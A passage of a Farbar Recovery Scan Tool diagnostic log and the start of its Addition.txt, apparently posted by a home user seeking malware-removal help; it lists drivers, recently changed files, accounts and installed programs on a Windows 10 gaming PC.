R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-16 12:15 - 000083675 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-16 14:41 - 000027363 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-16 14:41 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-15 22:31 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-13 12:49 - 2022-07-13 12:49 - 000000222 _____ C:\Users\Miggy\Desktop\Batman Arkham City GOTY.url
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ C:\Users\Miggy\AppData\Roaming\asof
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-15 23:03 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 22:50 - 2022-07-16 13:39 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
2022-06-20 17:27 - 2022-06-20 17:28 - 060760073 _____ C:\Users\Miggy\Downloads\Pokemon - SoulSilver Version (USA, Australia).zip
2022-06-20 17:22 - 2022-06-20 17:28 - 000000000 ____D C:\Users\Miggy\Downloads\desmume-0.9.13-win64
2022-06-20 17:22 - 2022-06-20 17:22 - 006086795 _____ C:\Users\Miggy\Downloads\desmume-0.9.13-win64.zip
2022-06-19 19:14 - 2022-07-10 16:26 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-06-19 18:44 - 2014-09-16 18:45 - 000447752 _____ (On2.com) C:\WINDOWS\SysWOW64\vp6vfw.dll
2022-06-19 18:24 - 2022-06-19 18:32 - 000000000 ____D C:\ProgramData\EA Desktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Electronic Arts
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\EADesktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2022-06-19 18:23 - 2022-06-19 18:23 - 001361536 _____ (Electronic Arts) C:\Users\Miggy\Downloads\EAappInstaller.exe
2022-06-19 12:31 - 2022-06-19 12:31 - 000953171 _____ C:\Users\Miggy\Downloads\pluto_t5_full_game.torrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2022-06-18 19:50 - 2022-06-18 19:50 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\HotPink and Annue
2022-06-16 19:23 - 2022-06-16 19:23 - 000104448 _____ C:\WINDOWS\system32\nettraceex.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 000232288 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-16 14:42 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-16 14:40 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-16 14:36 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-16 14:36 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-16 14:32 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-16 14:15 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-16 14:06 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-16 13:39 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-16 13:39 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-16 13:39 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-16 13:39 - 2020-08-10 01:20 - 000011819 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2022-07-16 13:39 - 2020-08-09 21:02 - 000012424 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-07-16 13:39 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-16 13:39 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-16 13:39 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-16 13:39 - 2020-02-05 16:07 - 000015984 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-07-16 13:39 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-16 13:38 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-16 13:37 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-16 13:36 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-16 12:10 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-16 12:08 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-16 12:08 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-16 12:07 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-16 12:06 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-16 12:05 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-15 23:03 - 2020-08-07 18:48 - 000013483 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-07-15 19:54 - 2020-08-10 15:18 - 000013155 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-07-15 19:54 - 2020-08-09 20:14 - 000012819 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-07-15 19:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-15 18:31 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-14 20:33 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-14 11:39 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-14 11:36 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-14 11:32 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-14 11:32 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-14 11:32 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:07 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-13 23:07 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-13 13:03 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-12 23:49 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 22:27 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 19:00 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-05 14:47 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-04 20:17 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:58 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
2022-06-19 18:24 - 2021-07-12 18:14 - 000000000 ____D C:\Program Files\Electronic Arts
2022-06-19 18:24 - 2020-01-24 10:47 - 000000000 ____D C:\ProgramData\Package Cache
2022-06-19 15:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-06-19 12:17 - 2021-12-25 13:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\Activision
2022-06-18 21:54 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-06-17 18:18 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\servicing
==================== Files in the root of some directories ========
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ () C:\Users\Miggy\AppData\Roaming\asof
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
heres my addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-07-2022
Ran by Miggy (16-07-2022 14:42:10)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_1) (Version: 23.4.1.547 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.229.5212 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.229.5212 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version: - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version: - Image-Line)
